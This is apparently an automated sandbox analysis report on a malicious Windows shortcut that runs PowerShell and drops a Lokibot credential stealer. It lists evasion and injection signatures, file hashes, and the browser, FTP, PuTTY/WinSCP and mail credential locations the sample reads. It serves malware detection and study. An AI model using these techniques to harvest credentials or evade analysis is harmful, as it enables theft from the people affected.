Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 4F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: BC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: C120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: D120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3537			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6313			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 1084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 64	Thread sleep time: -900000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000006.00000002.1470908849.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000007.00000002.1473273192.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63BC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]

6_2_0040317B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00402B7C GetProcessHeap,HeapAlloc,

6_2_00402B7C

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4552.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: unknown

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Users\user\Desktop\mjtjewi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 1392, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\mjtjewi.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: PopPassword		6_2_0040D069
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: SmtpPassword		6_2_0040D069

Yara detected Credential Stealer

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

ID:	1524798
Product:	CloudBasic
Start time:	09:19:31
Start date:	03.10.2024
Sample:	Comprobante.lnk.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b234c46d1f63b18ad2dc3f824bc0d6fa
SHA1:	fbdcce6b33b9e0ffbba48aadca0db9059af37141
SHA256:	8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mjtjewi.exe.log	ASCII text, with CRLF line terminators	873FA73F7EAAC5A90DC38988855C5032	694CDB950E35FE9EDBAE22377CBB1630F8F1DB84	501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	3EBBEC2F920D055DAC842B4FF84448FA	52D2AD86C481FAED6187FC7E6655C5BD646CA663	32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unwrbiun.5ww.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DB94D5DF4ADD0A06F261EAE73C2DA5DB	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
C:\Users\user\AppData\Roaming\188E93\31437F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06	data	5613DEA7B6F9C4C154D8E228D35F972D	E330C16379E078920136F9FF0E43F865B84E7B13	6472377665EEE67CA32FB8213E50A5577DC617DB5C53B9D35AAC4DA2C7D0DCEE
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp	data	B6C0A170557982613E817965D43EDDD8	153ED0A5BF421C6FB3E44A9B40D891A98343D176	D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)	data	B6C0A170557982613E817965D43EDDD8	153ED0A5BF421C6FB3E44A9B40D891A98343D176	D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
C:\Users\user\Desktop\mjtjewi.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DB94D5DF4ADD0A06F261EAE73C2DA5DB	A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1	8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70

Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Comprobante.lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Comprobante.lnk.lnk

Malware Threat Intel
Provided by